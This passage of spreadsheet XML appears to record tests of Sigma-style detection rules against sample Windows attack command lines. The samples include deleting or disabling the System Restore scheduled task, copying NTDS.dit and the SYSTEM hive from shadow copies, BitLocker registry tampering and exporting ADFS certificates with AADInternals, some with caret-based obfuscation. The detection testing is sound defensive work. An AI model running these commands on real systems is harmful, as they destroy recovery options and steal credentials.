      <c r="H15" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I15" s="43" t="n"/>
      <c r="J15" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K15" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="16" ht="22.5" customHeight="1" s="42">
      <c r="A16" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B16" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_delete</t>
        </is>
      </c>
      <c r="C16" s="43" t="inlineStr">
        <is>
          <t>Delete Important Scheduled Task</t>
        </is>
      </c>
      <c r="D16" s="43" t="inlineStr">
        <is>
          <t>dbc1f800-0fe0-4bc0-9c66-292c2abe3f78</t>
        </is>
      </c>
      <c r="E16" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe -delete -f -tn "\Microsoft\Windows\SystemRestore\SR"</t>
        </is>
      </c>
      <c r="F16" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G16" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H16" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I16" s="43" t="n"/>
      <c r="J16" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K16" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="17" ht="22.5" customHeight="1" s="42">
      <c r="A17" s="44" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B17" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_delete</t>
        </is>
      </c>
      <c r="C17" s="44" t="inlineStr">
        <is>
          <t>Delete Important Scheduled Task</t>
        </is>
      </c>
      <c r="D17" s="44" t="inlineStr">
        <is>
          <t>dbc1f800-0fe0-4bc0-9c66-292c2abe3f78</t>
        </is>
      </c>
      <c r="E17" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe "/delete" /f "/tn" "\Microsoft\Windows\SystemRestore\SR"</t>
        </is>
      </c>
      <c r="F17" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G17" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H17" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I17" s="43" t="inlineStr">
        <is>
          <t>Delete Important Scheduled Task (dbc1f800-0fe0-4bc0-9c66-292c2abe3f78)</t>
        </is>
      </c>
      <c r="J17" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K17" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="22.5" customHeight="1" s="42">
      <c r="A18" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B18" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_delete</t>
        </is>
      </c>
      <c r="C18" s="43" t="inlineStr">
        <is>
          <t>Delete Important Scheduled Task</t>
        </is>
      </c>
      <c r="D18" s="43" t="inlineStr">
        <is>
          <t>dbc1f800-0fe0-4bc0-9c66-292c2abe3f78</t>
        </is>
      </c>
      <c r="E18" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /del^ete /f /tn "\Microsoft\Windows\SystemRestore\SR"</t>
        </is>
      </c>
      <c r="F18" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G18" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H18" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I18" s="43" t="inlineStr">
        <is>
          <t>Delete Important Scheduled Task (dbc1f800-0fe0-4bc0-9c66-292c2abe3f78)</t>
        </is>
      </c>
      <c r="J18" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K18" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="19" ht="22.5" customHeight="1" s="42">
      <c r="A19" s="44" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B19" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_delete</t>
        </is>
      </c>
      <c r="C19" s="44" t="inlineStr">
        <is>
          <t>Delete Important Scheduled Task</t>
        </is>
      </c>
      <c r="D19" s="44" t="inlineStr">
        <is>
          <t>dbc1f800-0fe0-4bc0-9c66-292c2abe3f78</t>
        </is>
      </c>
      <c r="E19" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /delete /f /tn "/Microsoft/Windows/SystemRestore/SR"</t>
        </is>
      </c>
      <c r="F19" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G19" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H19" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I19" s="43" t="n"/>
      <c r="J19" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K19" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="20" ht="22.5" customHeight="1" s="42">
      <c r="A20" s="43" t="n"/>
      <c r="B20" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_delete_all</t>
        </is>
      </c>
      <c r="C20" s="43" t="inlineStr">
        <is>
          <t>Delete All Scheduled Tasks</t>
        </is>
      </c>
      <c r="D20" s="43" t="inlineStr">
        <is>
          <t>220457c1-1c9f-4c2e-afe6-9598926222c1</t>
        </is>
      </c>
      <c r="E20" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe -delete -tn * -f</t>
        </is>
      </c>
      <c r="F20" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G20" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H20" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I20" s="43" t="n"/>
      <c r="J20" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K20" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" s="42">
      <c r="A21" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B21" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_disable</t>
        </is>
      </c>
      <c r="C21" s="43" t="inlineStr">
        <is>
          <t>Disable Important Scheduled Task</t>
        </is>
      </c>
      <c r="D21" s="43" t="inlineStr">
        <is>
          <t>9ac94dc8-9042-493c-ba45-3b5e7c86b980</t>
        </is>
      </c>
      <c r="E21" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe -Change -TN "\Microsoft\Windows\SystemRestore\SR" -disable</t>
        </is>
      </c>
      <c r="F21" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G21" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H21" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I21" s="43" t="n"/>
      <c r="J21" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K21" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" s="42">
      <c r="A22" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B22" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_disable</t>
        </is>
      </c>
      <c r="C22" s="43" t="inlineStr">
        <is>
          <t>Disable Important Scheduled Task</t>
        </is>
      </c>
      <c r="D22" s="43" t="inlineStr">
        <is>
          <t>9ac94dc8-9042-493c-ba45-3b5e7c86b980</t>
        </is>
      </c>
      <c r="E22" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe "/Change" /TN "\Microsoft\Windows\SystemRestore\SR" "/disable"</t>
        </is>
      </c>
      <c r="F22" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G22" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H22" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I22" s="43" t="inlineStr">
        <is>
          <t>Disable Important Scheduled Task (9ac94dc8-9042-493c-ba45-3b5e7c86b980)</t>
        </is>
      </c>
      <c r="J22" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K22" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" s="42">
      <c r="A23" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B23" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_disable</t>
        </is>
      </c>
      <c r="C23" s="43" t="inlineStr">
        <is>
          <t>Disable Important Scheduled Task</t>
        </is>
      </c>
      <c r="D23" s="43" t="inlineStr">
        <is>
          <t>9ac94dc8-9042-493c-ba45-3b5e7c86b980</t>
        </is>
      </c>
      <c r="E23" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /Ch^a^nge /TN "\Microsoft\Windows\SystemRestore\SR" /dis^able</t>
        </is>
      </c>
      <c r="F23" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G23" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H23" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I23" s="43" t="inlineStr">
        <is>
          <t>Disable Important Scheduled Task (9ac94dc8-9042-493c-ba45-3b5e7c86b980)</t>
        </is>
      </c>
      <c r="J23" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K23" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" s="42">
      <c r="A24" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B24" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_disable</t>
        </is>
      </c>
      <c r="C24" s="43" t="inlineStr">
        <is>
          <t>Disable Important Scheduled Task</t>
        </is>
      </c>
      <c r="D24" s="43" t="inlineStr">
        <is>
          <t>9ac94dc8-9042-493c-ba45-3b5e7c86b980</t>
        </is>
      </c>
      <c r="E24" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Change /TN "/Microsoft/Windows/SystemRestore/SR" /disable</t>
        </is>
      </c>
      <c r="F24" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G24" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H24" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I24" s="43" t="n"/>
      <c r="J24" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K24" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" s="42">
      <c r="A25" s="43" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B25" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_sensitive_file_access_shadowcopy</t>
        </is>
      </c>
      <c r="C25" s="43" t="inlineStr">
        <is>
          <t>Sensitive File Access Via Volume Shadow Copy Backup</t>
        </is>
      </c>
      <c r="D25" s="43" t="inlineStr">
        <is>
          <t>f57f8d16-1f39-4dcb-a604-6c73d9b54b3d</t>
        </is>
      </c>
      <c r="E25" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy"1\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit</t>
        </is>
      </c>
      <c r="F25" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G25" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H25" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I25" s="43" t="inlineStr">
        <is>
          <t>Copy From VolumeShadowCopy Via Cmd.EXE (c73124a7-3e89-44a3-bdc1-25fe4df754b1); Copy From VolumeShadowCopy Via Cmd.EXE (c73124a7-3e89-44a3-bdc1-25fe4df754b1); Copying Sensitive Files with Credential Data (e7be6119-fc37-43f0-ad4f-1f3f99be2f9f); Copying Sensitive Files with Credential Data (e7be6119-fc37-43f0-ad4f-1f3f99be2f9f); Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08); Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08); Sensitive File Access Via Volume Shadow Copy Backup (f57f8d16-1f39-4dcb-a604-6c73d9b54b3d); Sensitive File Access Via Volume Shadow Copy Backup (f57f8d16-1f39-4dcb-a604-6c73d9b54b3d)</t>
        </is>
      </c>
      <c r="J25" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K25" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" s="42">
      <c r="A26" s="43" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B26" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_sensitive_file_access_shadowcopy</t>
        </is>
      </c>
      <c r="C26" s="43" t="inlineStr">
        <is>
          <t>Sensitive File Access Via Volume Shadow Copy Backup</t>
        </is>
      </c>
      <c r="D26" s="43" t="inlineStr">
        <is>
          <t>f57f8d16-1f39-4dcb-a604-6c73d9b54b3d</t>
        </is>
      </c>
      <c r="E26" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$vsc = '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy'; $file = '\NTDS.dit'; copy-item ($vsc + '1\Windows\NTDS' + $file) -Destination C:\Windows\Temp\ntds.dit"</t>
        </is>
      </c>
      <c r="F26" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G26" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H26" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I26" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08); Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08); Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Sensitive File Access Via Volume Shadow Copy Backup (f57f8d16-1f39-4dcb-a604-6c73d9b54b3d); Sensitive File Access Via Volume Shadow Copy Backup (f57f8d16-1f39-4dcb-a604-6c73d9b54b3d); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J26" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K26" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" s="42">
      <c r="A27" s="43" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B27" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_sensitive_file_access_shadowcopy</t>
        </is>
      </c>
      <c r="C27" s="43" t="inlineStr">
        <is>
          <t>Sensitive File Access Via Volume Shadow Copy Backup</t>
        </is>
      </c>
      <c r="D27" s="43" t="inlineStr">
        <is>
          <t>f57f8d16-1f39-4dcb-a604-6c73d9b54b3d</t>
        </is>
      </c>
      <c r="E27" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYS""TEM C:\Windows\Temp\VSC_SYSTEM_HIVE</t>
        </is>
      </c>
      <c r="F27" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G27" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H27" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I27" s="43" t="inlineStr">
        <is>
          <t>Copy From VolumeShadowCopy Via Cmd.EXE (c73124a7-3e89-44a3-bdc1-25fe4df754b1); Copy From VolumeShadowCopy Via Cmd.EXE (c73124a7-3e89-44a3-bdc1-25fe4df754b1); Sensitive File Access Via Volume Shadow Copy Backup (f57f8d16-1f39-4dcb-a604-6c73d9b54b3d); Sensitive File Access Via Volume Shadow Copy Backup (f57f8d16-1f39-4dcb-a604-6c73d9b54b3d); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J27" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K27" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" s="42">
      <c r="A28" s="43" t="inlineStr">
        <is>
          <t>t1486</t>
        </is>
      </c>
      <c r="B28" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_bitlocker</t>
        </is>
      </c>
      <c r="C28" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reg Add BitLocker</t>
        </is>
      </c>
      <c r="D28" s="43" t="inlineStr">
        <is>
          <t>0e0255bf-2548-47b8-9582-c0955c9283f5</t>
        </is>
      </c>
      <c r="E28" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE" /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F28" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G28" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H28" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I28" s="43" t="n"/>
      <c r="J28" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K28" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" s="42">
      <c r="A29" s="43" t="inlineStr">
        <is>
          <t>t1486</t>
        </is>
      </c>
      <c r="B29" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_bitlocker</t>
        </is>
      </c>
      <c r="C29" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reg Add BitLocker</t>
        </is>
      </c>
      <c r="D29" s="43" t="inlineStr">
        <is>
          <t>0e0255bf-2548-47b8-9582-c0955c9283f5</t>
        </is>
      </c>
      <c r="E29" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE" /v UseAdvancedStartup /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F29" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G29" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H29" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I29" s="43" t="n"/>
      <c r="J29" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K29" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" s="42">
      <c r="A30" s="43" t="inlineStr">
        <is>
          <t>t1486</t>
        </is>
      </c>
      <c r="B30" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_bitlocker</t>
        </is>
      </c>
      <c r="C30" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reg Add BitLocker</t>
        </is>
      </c>
      <c r="D30" s="43" t="inlineStr">
        <is>
          <t>0e0255bf-2548-47b8-9582-c0955c9283f5</t>
        </is>
      </c>
      <c r="E30" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE" /v UseTPM /t REG_DWORD /d 2 /f</t>
        </is>
      </c>
      <c r="F30" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G30" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H30" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I30" s="43" t="n"/>
      <c r="J30" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K30" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" s="42">
      <c r="A31" s="43" t="inlineStr">
        <is>
          <t>t1486</t>
        </is>
      </c>
      <c r="B31" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_bitlocker</t>
        </is>
      </c>
      <c r="C31" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reg Add BitLocker</t>
        </is>
      </c>
      <c r="D31" s="43" t="inlineStr">
        <is>
          <t>0e0255bf-2548-47b8-9582-c0955c9283f5</t>
        </is>
      </c>
      <c r="E31" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE" /v UseTPMKey /t REG_DWORD /d 2 /f</t>
        </is>
      </c>
      <c r="F31" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G31" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H31" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I31" s="43" t="n"/>
      <c r="J31" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K31" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="32" ht="15.75" customHeight="1" s="42">
      <c r="A32" s="43" t="inlineStr">
        <is>
          <t>t1486</t>
        </is>
      </c>
      <c r="B32" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_bitlocker</t>
        </is>
      </c>
      <c r="C32" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reg Add BitLocker</t>
        </is>
      </c>
      <c r="D32" s="43" t="inlineStr">
        <is>
          <t>0e0255bf-2548-47b8-9582-c0955c9283f5</t>
        </is>
      </c>
      <c r="E32" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE" /v UseTPMKeyPIN /t REG_DWORD /d 2 /f</t>
        </is>
      </c>
      <c r="F32" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G32" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H32" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I32" s="43" t="n"/>
      <c r="J32" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K32" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" s="42">
      <c r="A33" s="43" t="inlineStr">
        <is>
          <t>t1486</t>
        </is>
      </c>
      <c r="B33" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_bitlocker</t>
        </is>
      </c>
      <c r="C33" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reg Add BitLocker</t>
        </is>
      </c>
      <c r="D33" s="43" t="inlineStr">
        <is>
          <t>0e0255bf-2548-47b8-9582-c0955c9283f5</t>
        </is>
      </c>
      <c r="E33" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE" /v UseTPMPIN /t REG_DWORD /d 2 /f</t>
        </is>
      </c>
      <c r="F33" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G33" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H33" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I33" s="43" t="n"/>
      <c r="J33" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K33" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" s="42">
      <c r="A34" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B34" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C34" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D34" s="43" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E34" s="43" t="inlineStr">
        <is>
          <t>reg.exe add HKCU\Control\ Panel\Desktop /v Wallpaper /d C:\Users\Public\bg.jpg</t>
        </is>
      </c>
      <c r="F34" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G34" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H34" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I34" s="43" t="n"/>
      <c r="J34" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K34" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="35" ht="15.75" customHeight="1" s="42">
      <c r="A35" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B35" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C35" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D35" s="43" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E35" s="43" t="inlineStr">
        <is>
          <t>reg.exe add HKCU\Control_Panel\Desktop /v Wallpaper /d C:\Users\Public\bg.jpg</t>
        </is>
      </c>
      <c r="F35" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G35" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H35" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I35" s="43" t="n"/>
      <c r="J35" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K35" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="36" ht="15.75" customHeight="1" s="42">
      <c r="A36" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B36" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C36" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D36" s="43" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E36" s="43" t="inlineStr">
        <is>
          <t>reg add HKCU\Control\ Panel\Desktop /v Wallpaper /d C:\Users\Public\bg.jpg</t>
        </is>
      </c>
      <c r="F36" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G36" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H36" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I36" s="43" t="n"/>
      <c r="J36" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K36" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="37" ht="15.75" customHeight="1" s="42">
      <c r="A37" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B37" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C37" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D37" s="43" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E37" s="43" t="inlineStr">
        <is>
          <t>reg.exe add HKCU\Control Panel\Desktop /v Wallpaper /d C:\Users\Public\bg.jpg</t>
        </is>
      </c>
      <c r="F37" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G37" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H37" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I37" s="43" t="n"/>
      <c r="J37" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K37" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" s="42">
      <c r="A38" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B38" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_aadinternals_cmdlets_execution</t>
        </is>
      </c>
      <c r="C38" s="43" t="inlineStr">
        <is>
          <t>AADInternals PowerShell Cmdlets Execution - ProccessCreation</t>
        </is>
      </c>
      <c r="D38" s="43" t="inlineStr">
        <is>
          <t>c86500e9-a645-4680-98d7-f882c70c1ea3</t>
        </is>
      </c>
      <c r="E38" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" -Command "&amp; {Import-Module AADInternals -Force; $certs = Export-AADIntADFSCertificates; Get-ChildItem | Where-Object {$_ -like 'ADFS*'}; Write-Host '`nCertificates retrieved successfully'}"</t>
        </is>
      </c>
      <c r="F38" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G38" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H38" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I38" s="43" t="n"/>
      <c r="J38" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K38" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" s="42">
      <c r="A39" s="43" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B39" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_aadinternals_cmdlets_execution</t>
        </is>
      </c>
      <c r="C39" s="43" t="inlineStr">
        <is>
          <t>AADInternals PowerShell Cmdlets Execution - ProccessCreation</t>
        </is>
      </c>
      <c r="D39" s="43" t="inlineStr">
        <is>
          <t>c86500e9-a645-4680-98d7-f882c70c1ea3</t>
        </is>
      </c>
      <c r="E39" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" -Command "&amp; {Import-Module AADInternals -Force; Export-AADIntADFSCertificates | Out-Null; Get-ChildItem | Where-Object {$_ -like 'ADFS*'}; Write-Host '`nCertificates retrieved successfully'}"</t>
        </is>
      </c>
      <c r="F39" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G39" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H39" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I39" s="43" t="n"/>
      <c r="J39" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K39" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" s="42">
      <c r="A40" s="43" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B40" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_shadowcopy_access</t>
        </is>
      </c>
      <c r="C40" s="43" t="inlineStr">
        <is>
          <t>Copy From VolumeShadowCopy Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D40" s="43" t="inlineStr">
        <is>
          <t>c73124a7-3e89-44a3-bdc1-25fe4df754b1</t>
        </is>
      </c>
      <c r="E40" s="43" t="inlineStr">
        <is>
